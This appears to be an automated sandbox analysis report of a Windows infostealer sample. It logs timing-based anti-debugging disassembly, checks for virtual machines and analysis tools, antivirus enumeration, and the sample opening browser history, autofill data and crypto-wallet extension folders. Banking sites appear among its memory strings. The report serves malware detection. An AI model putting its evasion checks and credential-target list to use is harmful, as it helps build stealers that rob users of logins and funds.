        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AE2B1 second address: 64ADB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a popad 0x0000000b push dword ptr [ebp+122D16E1h] 0x00000011 jmp 00007FA1CCF9D8C1h 0x00000016 call dword ptr [ebp+122D1D95h] 0x0000001c pushad 0x0000001d jmp 00007FA1CCF9D8C4h 0x00000022 xor eax, eax 0x00000024 sub dword ptr [ebp+122D1D76h], ebx 0x0000002a mov dword ptr [ebp+122D1D76h], esi 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 cld 0x00000035 cld 0x00000036 mov dword ptr [ebp+122D37E5h], eax 0x0000003c jno 00007FA1CCF9D8BCh 0x00000042 mov esi, 0000003Ch 0x00000047 mov dword ptr [ebp+122D1E60h], edx 0x0000004d stc 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 ja 00007FA1CCF9D8BCh 0x00000058 lodsw 0x0000005a mov dword ptr [ebp+122D2673h], edi 0x00000060 jmp 00007FA1CCF9D8BBh 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 pushad 0x0000006a mov dx, si 0x0000006d sub dl, FFFFFFB8h 0x00000070 popad 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 stc 0x00000076 pushad 0x00000077 mov ecx, dword ptr [ebp+122D38D9h] 0x0000007d push ebx 0x0000007e mov edi, dword ptr [ebp+122D37C9h] 0x00000084 pop eax 0x00000085 popad 0x00000086 nop 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007FA1CCF9D8BCh 0x0000008e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662BCAA second address: 662BCAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662BCAE second address: 662BCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662AEEE second address: 662AF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1CCCD2146h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jnc 00007FA1CCCD2146h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662AF07 second address: 662AF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA1CCF9D8B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662B179 second address: 662B184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1CCCD2146h 0x0000000a popad 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662B184 second address: 662B1AC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1CCF9D8B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FA1CCF9D8BEh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 ja 00007FA1CCF9D8E0h 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007FA1CCF9D8B6h 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662B333 second address: 662B339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662EFE1 second address: 662EFE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662EFE7 second address: 662F008 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D3971h] 0x0000000f push 00000000h 0x00000011 xor dword ptr [ebp+122D270Bh], edi 0x00000017 push 83B8D22Ch 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F008 second address: 662F00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F00C second address: 662F016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F016 second address: 662F0AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 7C472E54h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FA1CCF9D8B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007FA1CCF9D8BEh 0x00000030 push 00000003h 0x00000032 mov edx, dword ptr [ebp+122D34ACh] 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1DBDh], ebx 0x00000040 push 00000003h 0x00000042 jmp 00007FA1CCF9D8C9h 0x00000047 call 00007FA1CCF9D8B9h 0x0000004c jmp 00007FA1CCF9D8C0h 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 push esi 0x00000056 pop esi 0x00000057 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F0AF second address: 662F0E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FA1CCCD214Bh 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA1CCCD2157h 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F0E4 second address: 662F0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F0EA second address: 662F10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FA1CCCD214Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F10F second address: 662F113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F113 second address: 662F11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA1CCCD2146h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F201 second address: 662F214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007FA1CCF9D8B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F214 second address: 662F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F21A second address: 662F222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F222 second address: 662F29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 mov si, ax 0x0000000a push 00000000h 0x0000000c mov dword ptr [ebp+122D1DCAh], esi 0x00000012 mov dword ptr [ebp+122D284Ch], ebx 0x00000018 call 00007FA1CCCD2149h 0x0000001d je 00007FA1CCCD2152h 0x00000023 jp 00007FA1CCCD214Ch 0x00000029 push eax 0x0000002a jns 00007FA1CCCD2167h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 jbe 00007FA1CCCD214Ch 0x0000003b jne 00007FA1CCCD2146h 0x00000041 push ebx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 popad 0x00000046 mov eax, dword ptr [eax] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F29B second address: 662F29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F29F second address: 662F2A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F2A5 second address: 662F339 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007FA1CCF9D8BBh 0x00000011 pop eax 0x00000012 stc 0x00000013 push 00000003h 0x00000015 movzx esi, di 0x00000018 push 00000000h 0x0000001a jnl 00007FA1CCF9D8BCh 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FA1CCF9D8B8h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov di, 339Bh 0x00000040 push 8B8F3EF4h 0x00000045 jmp 00007FA1CCF9D8C8h 0x0000004a add dword ptr [esp], 3470C10Ch 0x00000051 xor dword ptr [ebp+122D294Eh], ebx 0x00000057 lea ebx, dword ptr [ebp+12454EE9h] 0x0000005d mov dword ptr [ebp+122D31E0h], edx 0x00000063 xchg eax, ebx 0x00000064 push edx 0x00000065 pushad 0x00000066 push ebx 0x00000067 pop ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F3AA second address: 662F415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D1D7Bh] 0x0000000f sbb dx, 16B5h 0x00000014 push 00000000h 0x00000016 mov ecx, 3E70162Fh 0x0000001b push 2A153FA4h 0x00000020 jns 00007FA1CCCD2150h 0x00000026 xor dword ptr [esp], 2A153F24h 0x0000002d pushad 0x0000002e mov edx, dword ptr [ebp+122D1F74h] 0x00000034 push edx 0x00000035 mov eax, dword ptr [ebp+122D37B1h] 0x0000003b pop edx 0x0000003c popad 0x0000003d push 00000003h 0x0000003f mov edx, dword ptr [ebp+122D37F5h] 0x00000045 mov edi, dword ptr [ebp+122D38D1h] 0x0000004b push 00000000h 0x0000004d mov dh, D9h 0x0000004f push 00000003h 0x00000051 sub dword ptr [ebp+122D270Bh], edi 0x00000057 push B1C67D00h 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F415 second address: 662F419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662F419 second address: 662F431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5BC87A instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5BC92B instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5BA2E2 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7E65E3 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64ADAF1 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64ADB8A instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 66526C0 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 667B66A instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 66655C7 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 5884Thread sleep time: -34017s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 3868Thread sleep time: -36018s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 2436Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 4084Thread sleep time: -32016s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: file.exe, file.exe, 00000000.00000002.2463571852.0000000000739000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2358730980.00000000012FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125813336.0000000005CE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.0000000001278000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: file.exe, 00000000.00000002.2464239287.0000000001311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
        Source: file.exe, 00000000.00000002.2464239287.0000000001311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: file.exe, 00000000.00000003.2125813336.0000000005CE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
        Source: file.exe, 00000000.00000002.2463571852.0000000000739000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
        Source: C:\Users\user\Desktop\file.exeFile opened: SICE
        Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: file.exe, file.exe, 00000000.00000002.2463571852.0000000000739000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 7Program Manager
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: file.exe, 00000000.00000003.2357972834.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361600016.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221296992.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208277597.0000000005CBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
